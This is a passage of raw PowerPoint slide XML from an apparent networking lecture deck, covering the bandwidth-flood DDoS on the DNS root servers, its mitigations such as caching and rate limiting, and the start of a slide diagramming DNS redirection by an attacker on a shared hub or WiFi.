              <a:t>Ping packets sent from bots to the 13 DNS root servers. Goal: bandwidth flood servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Minimal impact:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>DNS caching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>rate limiting at upstream routers: filter ping when they arrive at an excessive rate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>During attack, some networks filtered pings; corresponding root servers remained up.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Root server attack is easy to defend: download root server database to local (default) name servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Not much data in root server; changes infrequently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TLD servers are more volatile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Similar kind of attack in May 2004, Feb 2007</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36870" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="7037" t="7510" r="6296" b="9119"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6664325" y="4724400"/>
            <a:ext cx="5943600" cy="4287838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{863FC47A-C947-4762-84FB-C159D3C8F74E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37891" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="787400" y="914400"/>
            <a:ext cx="11053763" cy="16256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DNS attack: redirecting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37892" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1397000" y="2438400"/>
            <a:ext cx="8970963" cy="4006850"/>
            <a:chOff x="717" y="1462"/>
            <a:chExt cx="3973" cy="1775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="37896" name="Object 4"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="738" y="1833"/>
            <a:ext cx="385" cy="328"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s37939" name="Clip" r:id="rId4" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId4" imgW="1307079" imgH="1083682"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 y="1833"/>
                          <a:ext cx="385" cy="328"/>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37897" name="Group 5"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4110" y="1875"/>
              <a:ext cx="150" cy="305"/>
              <a:chOff x="4180" y="783"/>
              <a:chExt cx="150" cy="307"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37914" name="AutoShape 6"/>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7915" name="Rectangle 7"/>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7916" name="Rectangle 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7917" name="AutoShape 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7918" name="Line 10"/>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en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37919" name="Line 11"/>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en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37920" name="Rectangle 1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7921" name="Rectangle 13"/>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grpSp>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="37898" name="Object 14"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="1565" y="2684"/>
            <a:ext cx="385" cy="328"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s37940" name="Clip" r:id="rId6" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId6" imgW="1307079" imgH="1083682" progId="">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5" y="2684"/>
                          <a:ext cx="385" cy="328"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="37899" name="Rectangle 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1628" y="2023"/>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pPr algn="l"/>
              <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37900" name="Freeform 16"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2227" y="1462"/>
              <a:ext cx="1289" cy="1291"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 218 w 1292"/>
                <a:gd name="T1" fmla="*/ 7 h 1255"/>
                <a:gd name="T2" fmla="*/ 35 w 1292"/>
                <a:gd name="T3" fmla="*/ 287 h 1255"/>
                <a:gd name="T4" fmla="*/ 29 w 1292"/>
                <a:gd name="T5" fmla="*/ 946 h 1255"/>
                <a:gd name="T6" fmla="*/ 53 w 1292"/>
                <a:gd name="T7" fmla="*/ 1499 h 1255"/>
                <a:gd name="T8" fmla="*/ 224 w 1292"/>
                <a:gd name="T9" fmla="*/ 1576 h 1255"/>
                <a:gd name="T10" fmla="*/ 625 w 1292"/>
                <a:gd name="T11" fmla="*/ 2041 h 1255"/>
                <a:gd name="T12" fmla="*/ 953 w 1292"/>
                <a:gd name="T13" fmla="*/ 2239 h 1255"/>
                <a:gd name="T14" fmla="*/ 1136 w 1292"/>
                <a:gd name="T15" fmla="*/ 1851 h 1255"/>
                <a:gd name="T16" fmla="*/ 1208 w 1292"/>
                <a:gd name="T17" fmla="*/ 806 h 1255"/>
                <a:gd name="T18" fmla="*/ 1142 w 1292"/>
                <a:gd name="T19" fmla="*/ 381 h 1255"/>
                <a:gd name="T20" fmla="*/ 707 w 1292"/>
                <a:gd name="T21" fmla="*/ 207 h 1255"/>
                <a:gd name="T22" fmla="*/ 218 w 1292"/>
                <a:gd name="T23" fmla="*/ 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sp>
          <p:nvSpPr>
            <p:cNvPr id="37901" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2668" y="1928"/>
              <a:ext cx="559" cy="204"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>network</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37902" name="Line 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1775" y="2070"/>
              <a:ext cx="0" cy="615"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37903" name="Line 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1098" y="1962"/>
              <a:ext cx="591" cy="7"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37904" name="Line 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1977" y="1962"/>
              <a:ext cx="304" cy="7"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37905" name="Line 21"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3495" y="1993"/>
              <a:ext cx="607" cy="7"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37906" name="Text Box 22"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1504" y="3033"/>
              <a:ext cx="567" cy="204"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37907" name="Text Box 23"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="717" y="2178"/>
              <a:ext cx="400" cy="204"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>client</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37908" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4002" y="2193"/>
              <a:ext cx="688" cy="368"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>local DNS</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37909" name="Text Box 25"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1655" y="1477"/>
              <a:ext cx="468" cy="368"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>hub or</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>WiFi </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37910" name="Line 26"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1090" y="1907"/>
              <a:ext cx="2996" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37911" name="Freeform 27"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1136" y="2001"/>
              <a:ext cx="673" cy="677"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 584 w 673"/>
                <a:gd name="T1" fmla="*/ 677 h 677"/>
                <a:gd name="T2" fmla="*/ 576 w 673"/>
                <a:gd name="T3" fmla="*/ 108 h 677"/>
                <a:gd name="T4" fmla="*/ 0 w 673"/>
                <a:gd name="T5" fmla="*/ 31 h 677"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 673"/>
                <a:gd name="T10" fmla="*/ 0 h 677"/>
                <a:gd name="T11" fmla="*/ 673 w 673"/>
                <a:gd name="T12" fmla="*/ 677 h 677"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T6">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T7">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T8">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T9" t="T10" r="T11" b="T12"/>
              <a:pathLst>
                <a:path w="673" h="677">
                  <a:moveTo>
                    <a:pt x="584" y="677"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="628" y="446"/>
                    <a:pt x="673" y="216"/>
                    <a:pt x="576" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="479" y="0"/>
                    <a:pt x="96" y="44"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37912" name="Text Box 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3530" y="1656"/>
              <a:ext cx="158" cy="204"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37913" name="Text Box 29"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1581" y="2310"/>
              <a:ext cx="158" cy="204"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37893" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1385888" y="6826250"/>
            <a:ext cx="5635625" cy="1608138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="649288" indent="-649288" algn="l">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client sends DNS query to its local </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
